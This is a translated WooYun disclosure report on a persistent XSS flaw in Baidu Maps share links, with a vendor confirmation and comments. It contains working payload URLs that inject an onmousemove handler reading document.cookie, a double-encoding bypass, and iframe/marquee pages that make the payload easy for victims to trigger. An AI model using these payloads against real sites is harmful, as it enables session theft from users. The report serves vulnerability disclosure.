Baidu Maps persistent XSS vulnerability

admin, 2015-05-27 20:57:11
Summary

2014-08-21: Details reported to the vendor, awaiting vendor handling
2014-08-21: Vendor confirmed; details disclosed to the vendor only
2014-08-31: Details disclosed to core white hats and domain experts
2014-09-10: Details disclosed to regular white hats
2014-09-20: Details disclosed to intern white hats
2014-10-05: Details disclosed to the public

Vulnerability overview

Defect ID: WooYun-2014-73258

Title: Baidu Maps persistent XSS vulnerability

Vendor: Baidu

Author: q601333824

Submitted: 2014-08-21 10:18

Published: 2014-10-05 10:20

Type: XSS (cross-site scripting)

Severity: Low

Self-assessed Rank: 3

Status: Vendor confirmed

Source: www.wooyun.org (contact them if you have questions or need help)

Tags: reflected XSS, persistent XSS, XSS exploitation techniques



Vulnerability details


Brief description:

Today the teacher covered how ARP works in class, so I changed my IP address to the classroom gateway's address; no idea whether it will do anything.......

Details:

1. Baidu Maps has a reflected XSS vulnerability; with a little extra work it can be used as a persistent XSS.

2. The link containing the XSS:

Code:
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%24<!XSS!>%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24

3. After decoding it reads:

Code:
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$<!XSS!>$$0$$$$$$1$$+to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$

4. The link above comes from searching for a driving route and adding a waypoint in that position, as shown:

[screenshot]

5. If the code is typed straight into the input box and Share is clicked, it errors because no such place exists and the returned page is empty, as shown:

(1) Enter the string in the input box

[screenshot]

(2) The share result page is cleared because the place does not exist.

[screenshot]

---------------------------------------------------------------------------------------

6. Instead, search for a real place first and then modify the parameter; now nothing is cleared, as shown:

(1) Search for a real, existing place

[screenshot]

(2) Then click "Share location" to get this link:

Code:
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%24<!XSssssssssssssssS!>%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24

(3) Then replace <!XSssssssssssssssS!> in the link above with the XSS payload; now the page is not cleared, as shown. The <span> here does not filter double quotes, so the value can break out of the attribute: XSS.

[screenshot]

------------------------------------------------------------------------------------

7. My own guess is that the link fetches the coordinates of the place typed into the box; when the place does not exist, no coordinates come back, an error is returned, and the page is set to clear its content on error. So, again my guess, if you first enter a real place so that its coordinates are obtained, and only then modify the parameter, nothing gets in the way.

Code:
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$<!XSS!>$$0$$$$$$1$$+to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$

The values between the $$...$$ separators are probably map coordinates (pure guess on my part).

---------------------------------------------------------------------------------

8. As in my previous report, a raw = sign makes the page clear, so encode it twice and it no longer clears:

Code:
= → %3d → %253d
Code:
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%2496315%22onmousemove%253D%22alert(document.cookie)%22%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24

9. The XSS spot is too small for most people to notice, so I built two web pages; the code is below.

(1)

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>中转</title>
</head>

<body>
<!-- Frames the XSS share link and shifts it up and to the left so that only
     the injected waypoint <span> (carrying the onmousemove handler) stays in view. -->
<iframe src="http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%2496315%22onmousemove%253D%22alert(document.cookie)%22%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24" height="900" width="1000" style="position:absolute; left:-900px; top:-670px;"></iframe>
</body>
</html>

Effect of the first page, as shown:

[screenshot]

(2)

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>存储型XSS测试</title>
</head>

<body>
<!-- Embeds the relay page (1.php) in a scrolling marquee so the tiny frame
     moves across the page and any mouse that crosses it fires the handler. -->
<marquee behavior="alternate">→→→→→→→→→→<iframe src="http://fripside.sinaapp.com/1.php" width="50" height="30" scrolling="no"></iframe>←←←←←←←←←←</marquee>
</body>
</html>

Combined with the first page, the effect of the second page, as shown:

[screenshot]

10. Put simply, the first page adjusts the position and size of the XSS.

Its iframe uses absolute positioning, so it cannot be moved around freely, but the second page embeds the first, and from there it can be placed anywhere.

11. Final result; visit this link to see it. I added a scrolling effect, so it can be planted on a website and used as a button:

Code:
http://fripside.sinaapp.com/2.php

12. Final screenshot

[screenshot]

Proof of vulnerability:

(1)

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>中转</title>
</head>

<body>
<iframe src="http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%2496315%22onmousemove%253D%22alert(document.cookie)%22%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24" height="900" width="1000" style="position:absolute; left:-900px; top:-670px;"></iframe>
</body>
</html>

(2)

Code:
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$<!XSS!>$$0$$$$$$1$$+to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$


(3) Final screenshot

[screenshot]

(4) Visit this link to see the effect:

Code:
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$<!XSS!>$$0$$$$$$1$$+to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$


Fix:

Filter.

Copyright: please credit q601333824@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: Low

Rank: 5

Confirmed: 2014-08-21 16:52

Vendor reply:

Thanks for the report; we will contact the business unit right away to deal with it.

Latest status:

None yet




Comments

  1. 2014-08-21 10:30 | 疯狗 (intern white hat | Rank: 44 | Bugs: 2 | "Read every vulnerability under heaven and the heart is naturally code-free.")

    You could pin the WooYun Summit hotel on the map and then pop up "See you on 12 September!"

  2. 2014-08-21 21:05 | 233 (passer-by | Rank: 14 | Bugs: 4 | "Kids who see this just can't hold back")

    you what is so diao (side-eye)
